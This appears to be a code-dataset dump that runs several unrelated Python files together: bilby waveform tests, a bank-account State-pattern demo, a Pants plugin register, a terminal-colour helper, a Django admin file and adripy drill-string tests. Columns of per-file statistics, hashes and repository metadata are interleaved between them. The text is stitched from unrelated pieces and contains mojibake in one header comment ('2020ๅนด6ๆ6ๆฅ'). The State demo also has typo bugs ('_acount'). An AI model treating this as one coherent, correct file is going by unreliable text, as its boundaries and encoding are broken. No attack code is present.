diff = np.sum(np.abs(freqseq[mode] - lalbbh[mode][self.full_frequencies_to_sequence])**2.)
norm = np.sum(np.abs(freqseq[mode])**2.)
self.assertLess(diff / norm, 1e-15)
def test_match_LalBBH_nonGR(self):
parameters = copy(self.parameters)
parameters.update(self.waveform_kwargs)
wf_dict = lal.CreateDict()
lalsimulation.SimInspiralWaveformParamsInsertNonGRDChi0(wf_dict, 1.)
parameters['lal_waveform_dictionary'] = wf_dict
freqseq = bilby.gw.source.binary_black_hole_frequency_sequence(
self.frequency_array, **parameters
)
lalbbh = bilby.gw.source.lal_binary_black_hole(
self.frequency_array, **parameters
)
self.assertEqual(freqseq.keys(), lalbbh.keys())
for mode in freqseq:
diff = np.sum(np.abs(freqseq[mode] - lalbbh[mode][self.full_frequencies_to_sequence])**2.)
norm = np.sum(np.abs(freqseq[mode])**2.)
self.assertLess(diff / norm, 1e-15)
class TestBNSfreqseq(unittest.TestCase):
def setUp(self):
self.parameters = dict(
mass_1=1.4,
mass_2=1.4,
luminosity_distance=400.0,
a_1=0.4,
a_2=0.3,
tilt_1=0.2,
tilt_2=1.7,
phi_jl=0.2,
phi_12=0.9,
theta_jn=1.7,
phase=0.0,
lambda_1=1000.0,
lambda_2=1000.0
)
minimum_frequency = 50.0
self.frequency_array = bilby.core.utils.create_frequency_series(2048, 16)
self.full_frequencies_to_sequence = self.frequency_array >= minimum_frequency
self.waveform_kwargs = dict(
waveform_approximant="IMRPhenomPv2_NRTidal",
reference_frequency=50.0,
minimum_frequency=minimum_frequency,
frequencies=self.frequency_array[self.full_frequencies_to_sequence]
)
def tearDown(self):
del self.parameters
del self.waveform_kwargs
del self.frequency_array
def test_with_valid_parameters(self):
self.parameters.update(self.waveform_kwargs)
self.assertIsInstance(
bilby.gw.source.binary_neutron_star_frequency_sequence(
self.frequency_array, **self.parameters
),
dict
)
def test_fails_without_tidal_parameters(self):
self.parameters.pop("lambda_1")
self.parameters.pop("lambda_2")
self.parameters.update(self.waveform_kwargs)
with self.assertRaises(TypeError):
bilby.gw.source.binary_neutron_star_frequency_sequence(
self.frequency_array, **self.parameters
)
def test_match_LalBNS(self):
self.parameters.update(self.waveform_kwargs)
freqseq = bilby.gw.source.binary_neutron_star_frequency_sequence(
self.frequency_array, **self.parameters
)
lalbns = bilby.gw.source.lal_binary_neutron_star(
self.frequency_array, **self.parameters
)
self.assertEqual(freqseq.keys(), lalbns.keys())
for mode in freqseq:
diff = np.sum(np.abs(freqseq[mode] - lalbns[mode][self.full_frequencies_to_sequence])**2.)
norm = np.sum(np.abs(freqseq[mode])**2.)
self.assertLess(diff / norm, 1e-5)
if __name__ == "__main__":
unittest.main()
| 34.735981
| 102
| 0.620973
| 1,714
| 14,867
| 5.105601
| 0.108518
| 0.095989
| 0.090504
| 0.055308
| 0.846646
| 0.828591
| 0.82082
| 0.807793
| 0.768027
| 0.750771
| 0
| 0.031085
| 0.285935
| 14,867
| 427
| 103
| 34.81733
| 0.793237
| 0.030134
| 0
| 0.657682
| 0
| 0
| 0.02526
| 0.009368
| 0
| 0
| 0
| 0
| 0.070081
| 1
| 0.091644
| false
| 0
| 0.016173
| 0
| 0.123989
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
658d552b6c0f8fc9454744d828ec43d7a994e0c7
| 3,064
|
py
|
Python
|
state.py
|
UtkucanBykl/python-design-patterns
|
1dcc64a3a522d0314e4eb3bb82dc850c1556e585
|
[
"MIT"
] | null | null | null |
state.py
|
UtkucanBykl/python-design-patterns
|
1dcc64a3a522d0314e4eb3bb82dc850c1556e585
|
[
"MIT"
] | 3
|
2019-09-30T10:42:24.000Z
|
2019-10-09T12:31:22.000Z
|
state.py
|
UtkucanBykl/python-design-patterns
|
1dcc64a3a522d0314e4eb3bb82dc850c1556e585
|
[
"MIT"
] | 3
|
2019-10-08T15:25:45.000Z
|
2019-10-08T16:07:09.000Z
|
class Account:
def __init__(self):
self._state = Silver(self)
self.balance = 100
@property
def state(self):
return self._state
@state.setter
def state(self, value):
self._state = value
def get_balance(self):
return self._state.credit()
def set_money(self, money):
self._state.set_money(money)
def get_money(self, money):
self._state.get_money(money)
class Gold:
def __init__(self, account):
self._credit = 10
self._account = account
@property
def account(self):
return self._account
@account.setter
def account(self, value):
self._acount = value
def credit(self):
return self._credit + self.account.balance
def get_money(self, money):
self._account.balance = self._account.balance - money
self.state_control()
def set_money(self, money):
self._account.balance = self._account.balance + money
self.state_control()
def state_control(self):
if self._account.balance < 25:
self._account.state = Bronz(self._account)
elif self._account.balance < 100:
self._account.state = Silver(self._account)
class Silver:
def __init__(self, account):
self._credit = 5
self._account = account
@property
def account(self):
return self._account
@account.setter
def account(self, value):
self._account = value
def credit(self):
return self._credit + self.account.balance
def get_money(self, money):
self._account.balance = self._account.balance - money
self.state_control()
def set_money(self, money):
self._account.balance = self._account.balance + money
self.state_control()
def state_control(self):
if self._account.balance < 25:
self._account.state = Bronz(self._account)
elif self._account.balance >= 100:
self._account.state =Gold(self._account)
class Bronz:
def __init__(self, account):
self._credit = 1
self._account = account
@property
def account(self):
return self._account
@account.setter
def account(self, value):
self._acount = value
def credit(self):
return self._credit + self.account.balance
def get_money(self, money):
self._account.balance = self._account.balance - money
self.state_control()
def set_money(self, money):
self._account.balance = self._account.balance + money
self.state_control()
def state_control(self):
if self._account.balance > 100:
self._account.state = Gold(self._account)
elif self._account.balance >= 25:
self._account.state =Silver(self._account)
account = Account()
account.get_money(90)
print(account.state.__class__.__name__) # Bronz
account.set_money(30)
print(account.state.__class__.__name__) # Silver
account.set_money(300)
print(account.state.__class__.__name__) # Gold
| 24.512
| 61
| 0.637076
| 367
| 3,064
| 5.008174
| 0.087193
| 0.257345
| 0.205658
| 0.078346
| 0.826442
| 0.778564
| 0.686072
| 0.666485
| 0.666485
| 0.666485
| 0
| 0.012809
| 0.261097
| 3,064
| 124
| 62
| 24.709677
| 0.799028
| 0.005548
| 0
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.293478
| false
| 0
| 0
| 0.086957
| 0.423913
| 0.032609
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6592e0a5a464cb88d3304ccbfc2c373c9c579fdb
| 195
|
py
|
Python
|
src/python/verst/pants/k8s/register.py
|
dimitrijepetrovic/pants-plugins
|
fdef365d81cbeb9256015b470706249bb9e487df
|
[
"MIT"
] | 24
|
2017-04-10T01:29:44.000Z
|
2021-02-24T03:29:59.000Z
|
src/python/verst/pants/k8s/register.py
|
dimitrijepetrovic/pants-plugins
|
fdef365d81cbeb9256015b470706249bb9e487df
|
[
"MIT"
] | 1
|
2017-11-21T19:41:45.000Z
|
2017-11-21T19:41:45.000Z
|
src/python/verst/pants/k8s/register.py
|
dimitrijepetrovic/pants-plugins
|
fdef365d81cbeb9256015b470706249bb9e487df
|
[
"MIT"
] | 7
|
2017-07-24T13:51:07.000Z
|
2021-02-23T15:16:26.000Z
|
from pants.goal.task_registrar import TaskRegistrar as task
from .k8s_clone_namespace import K8SCloneNamespace
def register_goals():
task(name='k8s-clone', action=K8SCloneNamespace).install()
| 32.5
| 60
| 0.825641
| 25
| 195
| 6.28
| 0.72
| 0.101911
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022472
| 0.087179
| 195
| 5
| 61
| 39
| 0.859551
| 0
| 0
| 0
| 0
| 0
| 0.046154
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
65b06b090c69b1e7d61968c29bdffe54985ada13
| 681
|
py
|
Python
|
colorful.py
|
cxapython/hooker
|
cb63d0569017e3481002934793586a64b16651a3
|
[
"Apache-2.0"
] | 5
|
2021-06-10T06:46:57.000Z
|
2022-02-28T02:27:03.000Z
|
colorful.py
|
z876335662/hooker
|
d0bec95c04aec415fb103c8ceeec4f1cf8112285
|
[
"Apache-2.0"
] | null | null | null |
colorful.py
|
z876335662/hooker
|
d0bec95c04aec415fb103c8ceeec4f1cf8112285
|
[
"Apache-2.0"
] | 2
|
2021-12-14T12:18:07.000Z
|
2022-02-13T08:57:16.000Z
|
'''
Created on 2020ๅนด6ๆ6ๆฅ
@author: stephen
'''
def withColor(string, fg, bg=49):
print("\33[0m\33[%d;%dm%s\33[0m" % (fg, bg, string))
#front color
Red = 1
Green = 2
Yellow = 3
Blue = 4
Magenta = 5
Cyan = 6
White = 7
def red(string):
return withColor(string, Red+30) # Red
def green(string):
return withColor(string, Green+30) # Green
def yellow(string):
return withColor(string, Yellow+30) # Yellow
def blue(string):
return withColor(string, Blue+30) # Blue
def magenta(string):
return withColor(string, Magenta+30) # Magenta
def cyan(string):
return withColor(string, Cyan+30) # Cyan
def white(string):
return withColor(string, White+30) # White
| 21.967742
| 56
| 0.676946
| 102
| 681
| 4.519608
| 0.343137
| 0.260304
| 0.318872
| 0.409978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066308
| 0.180617
| 681
| 30
| 57
| 22.7
| 0.759857
| 0.133627
| 0
| 0
| 0
| 0
| 0.041739
| 0.041739
| 0
| 0
| 0
| 0
| 0
| 1
| 0.347826
| false
| 0
| 0
| 0.304348
| 0.652174
| 0.043478
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
65d7c775da8689873c9b30d870b242c319829844
| 213
|
py
|
Python
|
cursos/admin.py
|
santosgv/plataforma.cursos
|
5bbbfd65b9cbcfed9c7cf955c3d1866a1300c946
|
[
"MIT"
] | null | null | null |
cursos/admin.py
|
santosgv/plataforma.cursos
|
5bbbfd65b9cbcfed9c7cf955c3d1866a1300c946
|
[
"MIT"
] | null | null | null |
cursos/admin.py
|
santosgv/plataforma.cursos
|
5bbbfd65b9cbcfed9c7cf955c3d1866a1300c946
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Cursos, Aulas, Comentarios, NotasAulas
admin.site.register(Aulas)
admin.site.register(Cursos)
admin.site.register(Comentarios)
admin.site.register(NotasAulas)
| 26.625
| 58
| 0.826291
| 28
| 213
| 6.285714
| 0.428571
| 0.204545
| 0.386364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075117
| 213
| 8
| 59
| 26.625
| 0.893401
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
65e618ac964e73cb0c04f9e7807f43df0dc2d0f8
| 36,522
|
py
|
Python
|
test/test_drill_string.py
|
bthornton191/Adams_Modules
|
e5473c6dc194148353cefb9964ad2081e79741d7
|
[
"MIT"
] | 5
|
2019-07-01T01:38:44.000Z
|
2020-05-18T00:56:41.000Z
|
test/test_drill_string.py
|
bthornton191/Adams_Modules
|
e5473c6dc194148353cefb9964ad2081e79741d7
|
[
"MIT"
] | 4
|
2020-03-24T16:55:01.000Z
|
2021-03-20T00:44:18.000Z
|
test/test_drill_string.py
|
bthornton191/adamspy
|
e5473c6dc194148353cefb9964ad2081e79741d7
|
[
"MIT"
] | null | null | null |
"""Tests related to the DrillString class
"""
import unittest
import os
import traceback
from test import *
from adamspy import adripy #pylint: disable=wrong-import-position
class Test_DrillString(unittest.TestCase):
"""Tests the :obj:`DrillString` class.
"""
maxDiff = None
def setUp(self):
# Create a test config file containing the test database
adripy.create_cfg_file(TEST_CONFIG_FILENAME, [TEST_DATABASE_PATH, TEST_NEW_DATABASE_PATH])
# Create a DrillTool object representing a stabilizer
self.pdc_bit = adripy.DrillTool(TEST_PDC_FILE)
# Create a DrillTool object representing a motor
self.motor = adripy.DrillTool(TEST_MOTOR_FILE)
# Create a DrillTool object representing a stabilizer
self.stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
# Create a DrillTool object representing an mwd
self.mwd = adripy.DrillTool(TEST_MWD_FILE)
# Create a DrillTool object representing a stabilizer
self.upper_stabilizer = adripy.DrillTool(TEST_STABILIZER_FILE)
# Create a DrillTool object representing a collar
self.collar = adripy.DrillTool(TEST_COLLAR_FILE)
# Create a DrillTool object representing a drill pipe
self.drill_pipe = adripy.DrillTool(TEST_DRILLPIPE_FILE)
# Create a DrillTool object representing EUS
self.eus = adripy.DrillTool(TEST_EUS_FILE)
# Create a DrillTool object representing a top drive
self.top_drive = adripy.DrillTool(TEST_TOP_DRIVE_FILE)
def test_check_references_two_stabs(self):
"""Tests that `DrillString.check_for_references` returns two when checking for references to a stabilizer file in a string that has two references.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add tools to the drill string
drill_string.add_tool(self.pdc_bit)
drill_string.add_tool(self.motor)
drill_string.add_tool(self.stabilizer)
drill_string.add_tool(self.mwd)
drill_string.add_tool(self.upper_stabilizer)
# Check the number of references to the stabilizer file
num_refs = drill_string.check_for_references(TEST_STABILIZER_FILE)
self.assertEqual(num_refs, 2)
def test_check_references_one_stabs(self):
"""Tests that `DrillString.check_for_references` returns one when checking for references to a stabilizer file in a string that has one reference
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add tools to the drill string
drill_string.add_tool(self.pdc_bit)
drill_string.add_tool(self.motor)
drill_string.add_tool(self.stabilizer)
drill_string.add_tool(self.mwd)
# Check the number of references to the stabilizer file
num_refs = drill_string.check_for_references(TEST_STABILIZER_FILE)
self.assertEqual(num_refs, 1)
def test_add_tool(self):
"""Test the `DrillString.add_tool()` method.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool object to the DrillString object
drill_string.add_tool(self.stabilizer)
# Define the first expected element in DrillString.tools
expected_tool_dictionary = {
'DrillTool': self.stabilizer,
'Type': self.stabilizer.tool_type,
'Name': self.stabilizer.name,
'Property_File': self.stabilizer.property_file,
'Measure': 'no',
'Color': 'Default',
'Number_of_Joints': 1,
'Stack_Order': 1
}
self.assertEqual(drill_string.tools, [expected_tool_dictionary])
def test_write_string_to_database_with_collar(self):
"""Tests if the string file is written correctly when the string has a collar in it.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.collar, measure='yes', joints=TEST_NUMBER_OF_COLLARS, group_name=TEST_COLLAR_GROUPNAME)
drill_string.add_tool(self.drill_pipe, joints=TEST_NUMBER_OF_DRILLPIPES, group_name=TEST_DRILLPIPE_GROUPNAME)
drill_string.add_tool(self.eus, joints=TEST_NUMBER_OF_EUSPIPES, group_name=TEST_EUS_GROUPNAME, equivalent=True)
drill_string.add_tool(self.top_drive)
# Write drill string to file
drill_string.write_to_file(cdb=TEST_DATABASE_NAME)
expected_string_filename = os.path.join(TEST_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str')
failures = check_file_contents(expected_string_filename, EXPECTED_STRING_WRITE_TEXT_COLLAR)
self.assertListEqual(failures, [])
def test_write_string_to_database(self):
"""Test the `DrillString.write_to_file()` method.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Write drill string to file
drill_string.write_to_file(cdb=TEST_DATABASE_NAME)
expected_string_filename = os.path.join(TEST_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str')
failures = check_file_contents(expected_string_filename, EXPECTED_STRING_WRITE_TEXT)
self.assertListEqual(failures, [])
def test_write_string_to_database_with_dfb(self):
"""Test the `DrillString.write_to_file()` method.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add DFBs to the drill string
drill_string.parameters['Distance_from_Bit'] = [100, 200]
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Write drill string to file
drill_string.write_to_file(cdb=TEST_DATABASE_NAME)
expected_string_filename = os.path.join(TEST_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str')
failures = check_file_contents(expected_string_filename, EXPECTED_STRING_WRITE_TEXT_WITH_DFB)
self.assertListEqual(failures, [])
def test_publish_string_with_spaces_in_hole_path(self):
"""Tests if publish works when the hole path has spaces
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE_WITH_SPACES, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.collar, measure='yes', joints=TEST_NUMBER_OF_COLLARS, group_name=TEST_COLLAR_GROUPNAME)
drill_string.add_tool(self.drill_pipe, joints=TEST_NUMBER_OF_DRILLPIPES, group_name=TEST_DRILLPIPE_GROUPNAME)
drill_string.add_tool(self.eus, joints=TEST_NUMBER_OF_EUSPIPES, group_name=TEST_EUS_GROUPNAME, equivalent=True)
drill_string.add_tool(self.top_drive)
# Write drill string to file
try:
drill_string.write_to_file(cdb=TEST_NEW_DATABASE_NAME, publish=True)
pass
except FileNotFoundError:
self.fail()
def test_publish_string_to_new_database(self):
"""Test the `DrillString.write_to_file()` method with publish=True
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Publish drill string to new database
drill_string.write_to_file(cdb=TEST_NEW_DATABASE_NAME, publish=True, publish_event=True)
expected_string_filename = os.path.join(TEST_NEW_DATABASE_PATH, 'drill_strings.tbl', TEST_STRING_NAME + '.str')
expected_text = EXPECTED_STRING_WRITE_TEXT.replace(TEST_DATABASE_NAME, TEST_NEW_DATABASE_NAME)
failures = check_file_contents(expected_string_filename, expected_text)
self.assertListEqual(failures, [])
def test_publish_string_with_duplicate_tools_to_new_database_1(self):
"""Test the `DrillString.write_to_file()` method with publish=True when the string contains two of the same stabilizer. The criteria for this test is that only a single tool file is published to the database even though the tool is used twice.
Notes
-----
This test intentionally uses a string that uses the same tool twice.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.mwd, measure='yes')
drill_string.add_tool(self.upper_stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Publish drill string to new database
drill_string.write_to_file(cdb=TEST_NEW_DATABASE_NAME, publish=True, publish_event=True)
expected_files = [adripy.get_full_path(drill_string.tools[1]['Property_File'])]
actual_files = glob.glob(os.path.join(TEST_NEW_DATABASE_PATH, 'stabilizers.tbl', '*'))
self.assertListEqual(actual_files, expected_files)
def test_publish_string_with_duplicate_tools_to_new_database_2(self):
"""Test the `DrillString.write_to_file()` method with `publish=True` when the string contains two of the same stabilizer. The criteria for this test is that the `DrillTool` that is used twice has the same property file and it is correct.
Note
----
This test intentionally uses a string that uses the same tool twice.
"""
# Create a DrillString object
drill_string = adripy.DrillString(TEST_STRING_NAME, TEST_EXISTING_HOLE_FILE, TEST_EVENT_FILE)
# Add the DrillTool objects to the DrillString object
drill_string.add_tool(self.pdc_bit, measure='yes')
drill_string.add_tool(self.stabilizer, measure='yes')
drill_string.add_tool(self.mwd, measure='yes')
drill_string.add_tool(self.upper_stabilizer, measure='yes')
drill_string.add_tool(self.drill_pipe, joints=20, group_name='Upper_DP_Group')
drill_string.add_tool(self.eus, joints=20, group_name='equivalent_pipe', equivalent=True)
drill_string.add_tool(self.top_drive)
# Publish drill string to new database
drill_string.write_to_file(cdb=TEST_NEW_DATABASE_NAME, publish=True, publish_event=True)
actual_files = [drill_string.tools[i]['Property_File'] for i in [1,3]]
expected_files = [os.path.join(f'<{TEST_NEW_DATABASE_NAME}>', 'stabilizers.tbl', 'example_stabilizer.sta')]*2
self.assertListEqual(actual_files, expected_files)
def test_read_string_from_file_with_spaces_in_hole_ref(self):
"""Tests that the parameters in the string are correct after a string is read from a file.
"""
# Read new parameters into the drill string object from a file
string_file = os.path.join(f'<{TEST_DATABASE_NAME}>', 'drill_strings.tbl', TEST_EXISTING_STRING_NAME_WITH_SPACES_IN_HOLE_REF + '.str')
drill_string_from_file = adripy.DrillString.read_from_file(string_file)
# Remove some keys from the parameters dictionary
hole_filename = drill_string_from_file.parameters['Hole_Property_File']
self.assertEqual(hole_filename, TEST_EXISTING_HOLE_FILE_WITH_SPACES)
def test_read_string_from_file_parameters(self):
"""Tests that the parameters in the string are correct after a string is read from a file.
"""
expected_parameters = {
'Units': 'Imperial',
'ModelName': 'test_string',
'OutputName': 'test_string',
'Gravity': 32.187,
'Deviation_Deg': 0.0,
'Adams_Results': 'animation',
'Adams_Graphics': 'off',
'Adams_Requests': 'on',
'Distance_from_Bit': [100.0, 300.0, 500.0],
'SolverDLL': 'adrill_solver',
'Hole_Property_File': '<example_database>\\holes.tbl\\test_hole.hol',
'Contact_Method': 'Subroutine',
'Cyl_Drag_Coeff': 1.0,
'Hole_Color': 'LtGray',
'Event_Property_File': '<example_database>\\events.tbl\\test_event.evt'
}
# Read new parameters into the drill string object from a file
string_file = os.path.join(f'<{TEST_DATABASE_NAME}>', 'drill_strings.tbl', TEST_EXISTING_STRING_NAME + '.str')
drill_string_from_file = adripy.DrillString.read_from_file(string_file)
# Remove some keys from the parameters dictionary
drill_string_from_file.parameters.pop('_Distance_from_Bit')
self.assertDictEqual(drill_string_from_file.parameters, expected_parameters)
def test_read_string_from_file_measure_off_on_drillpipe(self):
"""Tests that the measures are correct after a string is read from a file.
"""
string_file = os.path.join(f'<{TEST_DATABASE_NAME}>', 'drill_strings.tbl', TEST_EXISTING_STRING_NAME + '.str')
drill_string_from_file = adripy.DrillString.read_from_file(string_file)
drill_pipe = drill_string_from_file.get_tool('drillpipe')
for tool in drill_string_from_file.tools:
if tool['DrillTool'] is drill_pipe:
measure = tool['Measure']
self.assertEqual(measure, 'no')
def test_read_string_from_file_no_dfb(self):
expected_parameters = {
'Units': 'Imperial',
'ModelName': 'test_string',
'OutputName': 'test_string',
'Gravity': 32.187,
'Deviation_Deg': 0.0,
'Adams_Results': 'animation',
'Adams_Graphics': 'off',
'Adams_Requests': 'on',
'Distance_from_Bit': [],
'SolverDLL': 'adrill_solver',
'Hole_Property_File': '<example_database>\\holes.tbl\\test_hole.hol',
'Contact_Method': 'Subroutine',
'Cyl_Drag_Coeff': 1.0,
'Hole_Color': 'LtGray',
'Event_Property_File': '<example_database>\\events.tbl\\test_event.evt'
}
# Read new parameters into the drill string object from a file
string_file = os.path.join(f'<{TEST_DATABASE_NAME}>', 'drill_strings.tbl', TEST_EXISTING_STRING_NAME_NO_DFB + '.str')
drill_string_from_file = adripy.DrillString.read_from_file(string_file)
# Remove some keys from the parameters dictionary
drill_string_from_file.parameters.pop('_Distance_from_Bit')
self.assertDictEqual(drill_string_from_file.parameters, expected_parameters)
def test_read_string_from_file_first_tool(self):
"""Tests that the first few tools are correct after the string is read from a file
"""
expected_tool = {
'Name': 'test_pdc',
'Type': 'pdc_bit',
'Property_File': '<example_database>\\pdc_bits.tbl\\test_pdc.pdc',
'Measure': 'yes',
'Color': 'Default',
'Stack_Order': 1,
'Number_of_Joints': 1,
}
# Read new parameters into the drill string object from a file
drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
# Get the first tool
actual_tool = drill_string.tools[0]
# Remove the DrillTool key from the dictionary (for testing purposes)
actual_tool.pop('DrillTool')
self.assertDictEqual(actual_tool, expected_tool)
def test_read_string_from_file_drillpipe(self):
"""Tests that the first few tools are correct after the string is read from a file
"""
expected_tool = {
'Name': 'test_pdc',
'Type': 'pdc_bit',
'Property_File': '<example_database>\\pdc_bits.tbl\\test_pdc.pdc',
'Measure': 'yes',
'Color': 'Default',
'Stack_Order': 1,
'Number_of_Joints': 1,
}
# Read new parameters into the drill string object from a file
drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
# Get the first tool
actual_tool = drill_string.tools[0]
# Remove the DrillTool key from the dictionary (for testing purposes)
actual_tool.pop('DrillTool')
self.assertDictEqual(actual_tool, expected_tool)
def test_read_string_from_file_last_tool(self):
"""Tests that the first few tools are correct after the string is read from a file
"""
expected_tool = {
'Name': 'equivalent_pipe',
'Type': 'equivalent_upper_string',
'Property_File': '<example_database>\\drill_pipes.tbl\\test_eus.pip',
'Measure': 'yes',
'Color': 'Default',
'Stack_Order': 18,
'Number_of_Joints': 19,
}
# Read new parameters into the drill string object from a file
drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
# Get the first tool
actual_tool = drill_string.tools[-1]
# Remove the DrillTool key from the dictionary (for testing purposes)
actual_tool.pop('DrillTool')
self.assertDictEqual(actual_tool, expected_tool)
def test_read_string_from_file_bit_object(self):
"""Test that bit object attributes are corrct after a string is read from a file
"""
expected_property_file = '<example_database>\\pdc_bits.tbl\\test_pdc.pdc'
expected_name = 'test_pdc'
expected_tool_type = 'pdc_bit'
expected_extension = 'pdc'
expected_table = 'pdc_bits.tbl'
# Read new parameters into the drill string object from a file
drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
# Get the first tool
bit = drill_string.tools[0]['DrillTool']
failures = []
expected_attributes = [expected_property_file, expected_name, expected_tool_type, expected_extension, expected_table]
actual_attributes = [bit.property_file, bit.name, bit.tool_type, bit.extension]
for actual, expected in zip(actual_attributes, expected_attributes):
if actual != expected:
failures.append('Attribute Mismatch: {} -- {}'.format(actual, expected))
self.assertListEqual(failures,[])
def test_read_string_from_file_drillpipe_object(self):
"""Test that bit object attributes are corrct after a string is read from a file
"""
expected_property_file = '<example_database>\\drill_pipes.tbl\\test_eus.pip'
expected_name = 'test_eus'
expected_tool_type = 'drillpipe'
expected_extension = 'pip'
expected_table = 'drill_pipes.tbl'
# Read new parameters into the drill string object from a file
drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
# Get the first tool
bit = drill_string.tools[-1]['DrillTool']
failures = []
expected_attributes = [expected_property_file, expected_name, expected_tool_type, expected_extension, expected_table]
actual_attributes = [bit.property_file, bit.name, bit.tool_type, bit.extension]
for actual, expected in zip(actual_attributes, expected_attributes):
if actual != expected:
failures.append('Attribute Mismatch: {} -- {}'.format(actual, expected))
self.assertListEqual(failures,[])
def test_read_string_from_file_ntools(self):
"""Tests that the number of tools is correct after a string is read from a file
"""
expected_n_tools = 18
# Read new parameters into the drill string object from a file
drill_string = adripy.DrillString.read_from_file(TEST_EXISTING_STRING_FILE)
actual_n_tools = len(drill_string.tools)
self.assertEqual(actual_n_tools, expected_n_tools)
def test_read_string_from_file_collar(self):
"""Tests that a string file is read correctly when it has a collar in it.
"""
# Read new parameters into the drill string object from a file
